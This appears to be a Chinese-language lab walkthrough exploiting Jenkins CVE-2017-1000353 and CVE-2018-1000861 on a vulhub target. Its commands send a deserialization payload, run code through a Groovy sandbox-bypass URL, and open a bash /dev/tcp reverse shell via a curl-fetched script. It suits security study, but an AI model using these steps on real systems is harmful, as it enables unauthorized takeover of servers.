CVE-2017-1000353
1.扫描开放了8080端口,访问8080端口:
2、执行下面命令,生成字节码文件:
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
3、执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串,#"touch..."是待执行的任意命令
4、修改exploit.py,把proxies里面的内容注释掉
6、执行如下命令,把刚才生成的字节码文件(Jenkins_poc.ser)发送给目标:
python exploit.py http://192.168.225.139:8080 jenkins_poc.ser
7.在靶机的/tmp/success目录下查看是否创建成功,成功即漏洞成功利用。到~/桌面/vulhub/jenkins/CVE-2017-1000353目录下执行:
docker-compose exec jenkins bash
CVE-2018-1000861
Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。
通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权弱口令用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。
1.在url中输入,但是没有回显:
192.168.225.139:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"touch /tmp/CVE-2018-1000861_is_success".execute()}}
2.到容器中查看是否创建success,创建成功则漏洞成功利用:
sudo docker exec -it f2150f072e5a /bin/bash
如何反弹shell:
1.在root目录下写一个1.txt内容为反弹shell的:
bash -i >& /dev/tcp/192.168.225.133/1234 0>&1
2.在kali上开一个http服务,让靶机下载这个shell文件到他的机器上:
python3 -m http.server 85
3.然后使用curl命令进行下载,该命令的意思是下在kali的1.txt文件存到靶机的/tmp目录下名字叫1.sh(这里注意我们的txt的文件目录):
python exp.py http://192.168.225.139:8080/ "curl -o /tmp/1.sh http://192.168.225.133:85/1.txt"
4.然后使用脚本执行这个反弹shell的命令:
python exp.py http://192.168.225.139:8080/ "bash /tmp/1.sh"
5.成功反弹shell: